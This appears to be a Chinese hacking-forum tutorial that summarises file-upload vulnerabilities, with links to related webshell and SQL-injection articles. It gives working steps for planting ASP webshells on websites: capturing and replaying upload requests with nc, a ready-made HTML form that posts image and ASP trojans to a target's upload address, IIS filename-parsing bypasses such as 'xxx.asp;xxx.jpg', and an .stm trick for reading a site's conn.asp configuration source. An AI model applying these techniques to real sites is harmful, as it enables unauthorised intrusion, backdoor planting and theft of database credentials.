脚本入侵-上传漏洞总结篇(臭小子)                
                
                    所属分类:
                        网络安全 / 脚本攻防                    
                    阅读数:
                        237
                    
                        收藏 0赞 0分享
                    
                 
                
                    1:抓包上传 
我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具 
说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具 
很好用 
说到抓包上传 比如一个上传地址http://site/upload.asp 
或后台管理后台上传地址 
我们就抓包cookies 参数 和文件上传成功地址 
然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看 
2:抓包和nc上传 
抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt 
然后用编译C32asm 或等等编译工具 修改 
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt 
大家可以去百度搜索下nc上传 或突破 等等教程文章看 
3:本地上传漏洞 
把下面的代码 保存为hack92.html 
------------------------------ 
<HTML><HEAD> 
<META http-equiv=Content-Type content="text/html; charset=gb2312"> 
<STYLE type=text/css>BODY { 
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 
} 
.tx1 { 
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px 
} 
</STYLE> 
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> 
<BODY leftMargin=0 topMargin=0> 
<FORM name=form1 action="把上传地址复制这里到这里" method=post 
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> 
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML> 
------------------------------------------ 
添加上传地址 
把<FORM name=form1 action="把上传地址复制这里到这里" method=post 
把:把上传地址复制这里到这里 你的上传地址 
然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的ASP木马 
提示在上asp木马记得 加个空格 
4:iis漏洞 
把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg 
或建立asp.asp asa.asa 目录 上图片asp木马 
5:上传突破 
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了! 
大家可以去百度搜索相关的文章和教程                                    
             
            
                
                PHP Webshell 下的端口反弹方法
phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
                    
                    收藏 0赞 0分享
PHP+MySQL手工注入语句大全 MySQL手工注入语句总结
PHP + MySQL 手工注入语句大全,MySQL 手工注入语句总结,MySQL,注入语句。暴字段长度 匹配字段 暴字段位置 利用内置函数暴数据库信息 不用猜解可用字段暴数据库信息(有些网站不适用): 操作系统信息
                    
                    收藏 0赞 0分享
PHP 双字节、宽字节编码漏洞
PHP 双字节、宽字节编码漏洞。看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。还是用一个demo.php显示效果
                    
                    收藏 0赞 0分享
                 查看更多